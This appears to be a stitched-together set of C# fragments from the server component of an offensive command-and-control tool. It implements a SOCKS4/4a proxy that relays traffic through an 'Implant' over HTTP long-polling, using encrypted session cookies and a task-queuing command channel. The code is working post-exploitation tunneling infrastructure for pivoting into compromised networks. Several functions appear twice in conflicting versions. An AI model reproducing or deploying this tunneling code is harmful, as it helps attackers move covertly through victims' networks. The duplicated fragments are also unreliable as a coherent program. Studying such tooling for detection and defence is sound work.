void WriteResponseBackToClient(List <byte> payload)
{
_dataRecv += payload.Count();
if (_tc.Connected)
{
try
{
var stream = _tc.GetStream();
stream.Write(payload.ToArray(), 0, payload.Count);
stream.Flush();
ServerComms.LogMessage($"Recieved payload back from Implant (size: {payload.Count} for {_targetId} writing to client");
if (ServerComms.IsVerboseOn())
{
ServerComms.LogMessage($"Wrote {payload.Count} ");
}
if (!_tc.Connected)
{
ShutdownClient();
}
}
catch (Exception ex)
{
ServerComms.LogMessage($"ERROR Writing data back to {ex.Message}");
ShutdownClient();
}
}
else
{
ShutdownClient();
}
}
public static void NotifyConnection(String target, String status)
{
if (ServerComms.IsVerboseOn())
{
ServerComms.LogMessage($"Message has arrived back for {target}");
}
if (!mapTargetIdToSocksInstance.ContainsKey(target))
{
ServerComms.LogError($"Target {target} not found in Socks instance");
return;
}
var socksInstance = mapTargetIdToSocksInstance[target];
if (status.ToLower() == "open")
{
socksInstance._open = true;
}
else
{
socksInstance._open = false;
}
socksInstance.status = status;
socksInstance.LastUpdateTime = DateTime.Now;
if (socksInstance._waitOnConnect)
{
socksInstance.SocksTimeout.Set();
}
}
void CreateImplantSocksRequest()
{
ServerComms.LogMessage($"SOCKS Request to open {_targetHost}:{_targetPort}");
status = "opening";
LastUpdateTime = DateTime.Now;
_targetId = SocketComms.CreateNewConnectionTarget(_targetHost, _targetPort);
var thisptr = this;
if (null == thisptr)
{
ServerComms.LogError("This pointer is NULL something wrong here");
}
mapTargetIdToSocksInstance.TryAdd(_targetId, thisptr);
}
void WriteResponseBackToClient(List <byte> payload)
{
_dataRecv += payload.Count();
ServerComms.LogMessage($"Recieved payload back from Implant (size: {payload.Count} for {_targetId} writing to client");
if (_tc.Connected)
{
var stream = _tc.GetStream();
stream.Write(payload.ToArray(), 0, payload.Count);
stream.Flush();
StartCommsWithProxyAndImplant(stream);
}
else
{
ShutdownClient();
}
}
void ProcessCommandChanelImplantMessage(List <byte> message)
{
var xdoc = XDocument.Parse(UTF8Encoding.UTF8.GetString(message.ToArray()));
var elms = xdoc.XPathSelectElements("CommandChannel/ListenerStatus");
xdoc.XPathSelectElements("CommandChannel/ListenerStatus").ToList().ForEach(x =>
{
var nodeStatus = x.XPathSelectElement("Status");
if (nodeStatus != null)
{
var sessionId = nodeStatus.Attribute("SessionID").Value;
var status = nodeStatus.Value;
SocksProxy.NotifyConnection(sessionId, status);
ServerComms.LogMessage($"Status: connection {nodeStatus.Attribute("SessionID").Value} - {nodeStatus.Value}");
}
});
}
public static bool ReturnDataCallback(String target, List <byte> payload)
{
if (ServerComms.IsVerboseOn())
{
ServerComms.LogMessage($"Message has arrived back for {target}");
}
if (!mapTargetIdToSocksInstance.ContainsKey(target))
{
ServerComms.LogError($"Target {target} not found in Socks instance");
return(false);
}
var socksInstance = mapTargetIdToSocksInstance[target];
socksInstance.WriteResponseBackToClient(payload);
return(true);
}
void AcceptTcpClient(IAsyncResult iar)
{
var tcs = (TcpListener)iar.AsyncState;
TcpClient tc = null;
try
{
tc = tcs.EndAcceptTcpClient(iar);
}
catch (Exception ex)
{
if (_serverComms.IsVerboseOn())
{
_serverComms.LogError($"Initial SOCKS Read failed for endpoint {tcs.LocalEndpoint.ToString()} {ex.Message}".Trim());
}
return;
}
Task.Factory.StartNew(() =>
{
try
{
if (ServerComms.IsVerboseOn())
{
ServerComms.LogMessage($"Message arrived {tcs.LocalEndpoint.ToString()} from {tc.Client.RemoteEndPoint.ToString()}".Trim());
}
(new SocksProxy()
{
TOTALSOCKETTIMEOUT = SocketTimeout
}).ProcessRequest(tc, WaitOnConnect);
}
catch (Exception ex)
{
ServerComms.LogError($"Error occured on EndPoint {tcs.LocalEndpoint.ToString()} shutting down cause of {ex.Message}".Trim());
if (tc.Connected)
{
tc.Close();
}
return;
}
});
tcs.BeginAcceptTcpClient(AcceptTcpClient, tcs);
}
bool StartSocksInternal(String ipToListen, ushort localPort)
{
TcpListener tcs = null;
try
{
var socksIp = ("*" == ipToListen) ? IPAddress.Any : IPAddress.Parse(ipToListen);
tcs = new TcpListener(socksIp, localPort);
_listeners.Add(localPort, tcs);
tcs.Start();
ServerComms.LogMessage($"Socks proxy listening started on {socksIp.ToString()}:{localPort}");
}
catch (Exception ex)
{
ServerComms.LogError($"StartSocks {ex.Message}");
return(false);
}
tcs.BeginAcceptTcpClient(AcceptTcpClient, tcs);
return(true);
}
public bool StartSocks(String ipToListen, ushort localPort, IServiceController controller, ManualResetEvent cmdChannelRunning = null)
{
_controller = controller;
var onOff = (WaitOnConnect) ? "on" : "off";
ServerComms.LogMessage($"Wait for Implant TCP Connect before SOCKS Proxy response is {onOff}");
if (null != cmdChannelRunning)
{
Task.Factory.StartNew(() =>
{
ServerComms.LogMessage($"Waiting for command channel before starting SOCKS proxy");
cmdChannelRunning.WaitOne();
StartSocksInternal(ipToListen, localPort);
});
}
else
{
return(StartSocksInternal(ipToListen, localPort));
}
return(true);
}
void ProxySocketReadCallback(IAsyncResult iar)
{
var asyncState = (AsyncBufferState)iar.AsyncState;
try
{
var stream = asyncState.Stream;
int bytesRead = stream.EndRead(iar);
if (ShutdownRecieved || null == _tc)
{
return;
}
if (!_tc.Connected)
{
ShutdownClient();
try
{
if (_tc.Client != null)
{
ServerComms.LogError($"Connection to {_tc.Client.RemoteEndPoint.ToString()} closed");
}
}
catch (ObjectDisposedException)
{
ServerComms.LogError($"Connection to {_targetHost}:{_targetPort} closed");
}
return;
}
if (bytesRead > 0)
{
var payload = new List <byte>();
payload.AddRange(asyncState.Buffer.Take(bytesRead));
while (stream.CanRead && stream.DataAvailable)
{
if ((bytesRead = stream.Read(asyncState.Buffer, 0, HEADERLIMIT)) > 0)
{
payload.AddRange(asyncState.Buffer.Take(bytesRead));
}
}
SocketComms.SendDataToTarget(_targetId, payload);
ServerComms.LogMessage($"Client sent data (size: {payload.Count}) {_targetId} writing to Implant");
_dataSent += payload.Count;
}
}
catch (Exception ex)
{
try
{
if (_tc.Client != null)
{
ServerComms.LogError($"Connection to {_tc.Client.RemoteEndPoint.ToString()} has dropped cause {ex.Message}");
}
}
catch (ObjectDisposedException)
{
ServerComms.LogError($"Connection to {_targetHost}:{_targetPort} has dropped cause {ex.Message}");
}
ShutdownClient();
}
finally
{
asyncState.RecvdData.Set();
}
}
public void ProcessRequest(System.Net.HttpListenerContext ctx)
{
System.Net.Cookie sessionCookie = null;
try
{
sessionCookie = ctx.Request.Cookies[_sessionIdName];
if (sessionCookie == null || String.IsNullOrEmpty(sessionCookie.Value))
{
ctx.Response.StatusCode = 401;
ctx.Response.Close();
return;
}
}
catch (Exception ex)
{
ServerComms.LogMessage($"ERROR Processing session cookie {ex.Message}");
}
String decryptedSessionId = null, decryptedStatus = null;
try
{
var decr = _encryption.Decrypt(sessionCookie.Value);
if (decr == null)
{
throw new Exception($"Can't decrypt session cookie{sessionCookie.Value}");
}
var decryptedSessionStatus = UTF8Encoding.UTF8.GetString(decr.ToArray()).Split(':');
decryptedSessionId = decryptedSessionStatus[0];
decryptedStatus = decryptedSessionStatus[1];
if (String.IsNullOrWhiteSpace(decryptedSessionId))
{
throw new Exception($"Session cookie decrypted to nothing or whitespace");
}
}
catch (Exception ex)
{
ServerComms.LogError($"Error occured communicating with implant {ex.Message}");
ctx.Response.StatusCode = 500;
ctx.Response.Close();
return;
}
String response = null;
List <byte> responseBytes = new List <byte>();
String uploadedPayload = null;
//TO DO: Payload is currently coming up as different content types
try
{
if ("POST" == ctx.Request.HttpMethod)
{
//Yeah casting ContentLength64 to an int is not idle, but we should not be uploading anywhere near 2gb+ in one request!!!!!
uploadedPayload = (new StreamReader(ctx.Request.InputStream)).ReadToEnd();
}
else
if ("GET" == ctx.Request.HttpMethod)
{
var payloadCookie = ctx.Request.Cookies[PayloadCookieName];
//TO DO: Dodgy as hell. Need to make sure this can be tampered/malleable etc
//This could be whenever in the request. Need to sort that out
if (null != payloadCookie)
{
if (!String.IsNullOrWhiteSpace(payloadCookie.Value))
{
uploadedPayload = payloadCookie.Value;
}
}
}
}
catch (Exception ex)
{
ServerComms.LogMessage($"ERROR Processing payload data {decryptedSessionId} {ex.Message}");
}
ConnectionDetails dtls = null;
if (decryptedSessionId == _commandChannel)
{
try
{
var ready = false;
Int32 ctr = 0, cmdTasks = 0;
ProcessCommandChannelTime();
if (null == uploadedPayload || uploadedPayload.Count() == 0)
{
ServerComms.LogMessage($"Command channel sending {_commandTasks.Count()} tasks ");
}
else
{
mapSessionToConnectionDetails[_commandChannel].DataRecv += uploadedPayload.Count();
if (_commandTasks.Count() > 0)
{
ServerComms.LogMessage($"Command channel payload {uploadedPayload.Count()} bytes, sending {_commandTasks.Count()} tasks ");
}
ProcessCommandChanelImplantMessage(this._encryption.Decrypt(uploadedPayload));
}
lock (_commandLocker) { cmdTasks = _commandTasks.Count(); }
if (cmdTasks == 0)
{
while (!(ready = _cmdTaskWaitEvent.WaitOne(1000)) && ctr++ < 40)
{
;
}
}
lock (_commandLocker) { cmdTasks = _commandTasks.Count(); }
if (cmdTasks > 0)
{
response = new XElement("Response", new XElement("Tasks", PopQueueCommandTasks())).ToString();
}
else
{
response = BuildStandardResponse().ToString();
}
_cmdTaskWaitEvent.Reset();
responseBytes.AddRange(UTF8Encoding.UTF8.GetBytes(response));
mapSessionToConnectionDetails[_commandChannel].DataSent += responseBytes.Count();
}
catch (Exception ex)
{
ServerComms.LogMessage($"ERROR Processing command channel message {ex.Message}");
}
}
else
{
try
{
if (decryptedStatus == "closed")
{
ServerComms.LogMessage($"Close connection has been called on {decryptedSessionId}");
//Implant has called time
//cleanup the data queue
lock (_dataTasks)
{
if (_dataTasks.ContainsKey(decryptedSessionId))
{
_dataTasks[decryptedSessionId].Tasks.Clear();
var wait = _dataTasks[decryptedSessionId].Wait;
_dataTasks[decryptedSessionId].DisposeWait();
_dataTasks.Remove(decryptedSessionId);
}
}
lock (_listenerLocker)
{
_listeners.Remove(decryptedSessionId);
}
//Let the socks know its over
SocksProxy.ImplantCalledClose(decryptedSessionId);
ctx.Response.StatusCode = 200;
ctx.Response.OutputStream.Close();
return;
}
else if (SocksProxy.IsValidSession(decryptedSessionId))
{
if (!SocksProxy.IsSessionOpen(decryptedSessionId))
{
SocksProxy.NotifyConnection(decryptedSessionId, "open");
}
dtls = SocksProxy.GetDetailsForTargetId(decryptedSessionId);
if (null == uploadedPayload || uploadedPayload.Count() == 0)
{
if (ServerComms.IsVerboseOn())
{
ServerComms.LogMessage($"Requesting data for connection {dtls.HostPort}:{dtls.Id}");
}
}
else
{
ServerComms.LogMessage($"[Rx] {dtls.HostPort}:{dtls.Id} {uploadedPayload.Count()} bytes ");
SocksProxy.ReturnDataCallback(decryptedSessionId, this._encryption.Decrypt(uploadedPayload));
}
}
else
{
if (ServerComms.IsVerboseOn())
{
ServerComms.LogMessage($"Session ID {decryptedSessionId} is not valid");
}
ctx.Response.StatusCode = 404;
ctx.Response.OutputStream.Close();
return;
}
var ctr = 0;
var dataQueue = _dataTasks[decryptedSessionId];
var ready = false;
while (null != dataQueue.Wait && !(ready = dataQueue.Wait.WaitOne(1000)) && ctr++ < _longpolltimeout)
{
;
}
if (ready && dataQueue.Tasks.Count() > 0)
{
lock (dataQueue.PayloadLocker) {
while (dataQueue.Tasks.Count != 0)
{
responseBytes.AddRange(dataQueue.Tasks.Dequeue());
}
}
dataQueue.Wait.Reset();
if (null != dtls)
{
ServerComms.LogMessage($"[Tx] {dtls.HostPort}:{dtls.Id} {responseBytes.Count()} bytes ");
}
}
else
if (null != dtls)
{
ServerComms.LogMessage($"[Tx] {dtls.HostPort}:{dtls.Id} nothing to send. TimedOut: {!ready}");
}
}
catch (Exception ex)
{
ServerComms.LogMessage($"ERROR Processing response for connection {decryptedSessionId} {ex.Message}");
}
}
try
{
ctx.Response.StatusCode = 200;
var payload = EncryptPayload(responseBytes);
if (null != payload && payload.Count > 0)
{
ctx.Response.OutputStream.Write(payload.ToArray(), 0, payload.Count());
}
ctx.Response.OutputStream.Close();
}
catch (Exception ex)
{
ServerComms.LogMessage($"ERROR Writing response back to client {ex.Message}");
}
}
byte ProcessSocksHeaders(List <byte> buffer)
{
if (9 > buffer.Count || 256 < buffer.Count)
{
ServerComms.LogError($"Socks server: buffer size {buffer.Count} is not valid, must be between 9 & 256");
return(Socks4ClientHeader.Socks4ClientHeaderStatus.REQUEST_REJECTED_OR_FAILED);
}
byte version = buffer[0];
if (version == 0x4)
{
byte commandCode = buffer.Skip(1).Take(1).First();
BitConverter.ToUInt16(buffer.Skip(2).Take(2).ToArray(), 0);
BitConverter.ToUInt16(buffer.Skip(2).Take(2).Reverse().ToArray(), 0);
_targetPort = BitConverter.ToUInt16(buffer.Skip(2).Take(2).Reverse().ToArray(), 0);
var dstIp = buffer.Skip(4).Take(4).ToArray();
var tailBuffer = buffer.Skip(8);
var endUserIdx = tailBuffer.ToList().IndexOf(0x0) + 1;
if (-1 == endUserIdx)
{
ServerComms.LogError($"User id is invalid rejecting connection request");
return(Socks4ClientHeader.Socks4ClientHeaderStatus.REQUEST_REJECTED_OR_FAILED);
}
var userId = UTF8Encoding.UTF8.GetString(tailBuffer.Take(endUserIdx).ToArray());
//Check if SOCKS 4a and domain name specified
//If the domain name is to follow the IP will be in the format 0.0.0.x
if (0 == dstIp[0] && 0 == dstIp[1] && 0 == dstIp[2] && 0 != dstIp[3])
{
var endHostIdx = tailBuffer.Skip(endUserIdx).ToList().IndexOf(0x0);
var arrayHost = tailBuffer.Skip(endUserIdx).Take(endHostIdx).ToArray();
if (arrayHost.Length == 0)
{
ServerComms.LogError($"Host name is empty rejecting connection request");
return(Socks4ClientHeader.Socks4ClientHeaderStatus.REQUEST_REJECTED_OR_FAILED);
}
var dnsHost = UTF8Encoding.UTF8.GetString(arrayHost);
if (UriHostNameType.Unknown == Uri.CheckHostName(dnsHost))
{
ServerComms.LogError($"Host name {dnsHost} is invalid rejecting connection request");
return(Socks4ClientHeader.Socks4ClientHeaderStatus.REQUEST_REJECTED_OR_FAILED);
}
_targetHost = dnsHost;
}
else
{
_targetHost = new IPAddress(BitConverter.ToUInt32(dstIp, 0)).ToString();
}
ServerComms.LogMessage($"SOCKS Request to open {_targetHost}:{_targetPort}");
status = "opening";
LastUpdateTime = DateTime.Now;
_targetId = SocketComms.CreateNewConnectionTarget(_targetHost, _targetPort);
var thisptr = this;
if (null == thisptr)
{
ServerComms.LogError("This pointer is NULL something wrong here");
}
mapTargetIdToSocksInstance.Add(_targetId, thisptr);
if (_waitOnConnect)
{
SocksTimeout.WaitOne(SOCKSCONNECTIONTOOPENTIMEOUT);
if (!_open)
{
return(Socks4ClientHeader.Socks4ClientHeaderStatus.REQUEST_REJECTED_OR_FAILED);
}
}
}
else
{
return(Socks4ClientHeader.Socks4ClientHeaderStatus.REQUEST_REJECTED_OR_FAILED);
}
ServerComms.LogMessage($"Opened SOCKS port {_targetHost}:{_targetPort} targetid {_targetId}");
return(Socks4ClientHeader.Socks4ClientHeaderStatus.REQUEST_GRANTED);
}
void ProxySocketReadCallback(IAsyncResult iar)
{
var asyncState = (AsyncBufferState)iar.AsyncState;
var stream = asyncState.Stream;
int bytesRead = 0;
if (ShutdownRecieved || null == _tc)
{
return;
}
if (!_tc.Connected)
{
ShutdownClient();
try
{
if (_tc.Client != null)
{
ServerComms.LogError($"Connection to {_tc.Client.RemoteEndPoint.ToString()} closed");
}
}
catch (ObjectDisposedException)
{
ServerComms.LogError($"Connection to {_targetHost}:{_targetPort} closed");
}
return;
}
try
{
bytesRead = stream.EndRead(iar);
_dataSent += bytesRead;
if (bytesRead > 0)
{
var payload = new List <byte>();
payload.AddRange(asyncState.Buffer.Take(bytesRead));
Array.Clear(asyncState.Buffer, 0, asyncState.Buffer.Length);
while (stream.CanRead && stream.DataAvailable && (bytesRead = stream.Read(asyncState.Buffer, 0, HEADERLIMIT)) > 0)
{
payload.AddRange(asyncState.Buffer.Take(bytesRead));
Array.Clear(asyncState.Buffer, 0, asyncState.Buffer.Length);
}
//Not currently reading now so if anything comes in fair play
Interlocked.Decrement(ref CurrentlyReading);
ServerComms.LogMessage($"Client sent data (size: {payload.Count}) {_targetId} writing to Implant");
SocketComms.SendDataToTarget(_targetId, payload);
StartCommsWithProxyAndImplant(asyncState.Stream);
}
else
{
//No bytes have been read from the connection
//Try again and start the thread timeout cycle
Interlocked.Decrement(ref CurrentlyReading);
TimeoutEvent.WaitOne(timeout);
StartCommsWithProxyAndImplant(asyncState.Stream);
}
}
catch (Exception ex)
{
try
{
if (_tc.Client != null)
{
ServerComms.LogError($"Connection to {_tc.Client.RemoteEndPoint.ToString()} has dropped cause {ex.Message}");
}
}
catch (ObjectDisposedException)
{
ServerComms.LogError($"Connection to {_targetHost}:{_targetPort} has dropped cause {ex.Message}");
}
ShutdownClient();
}
}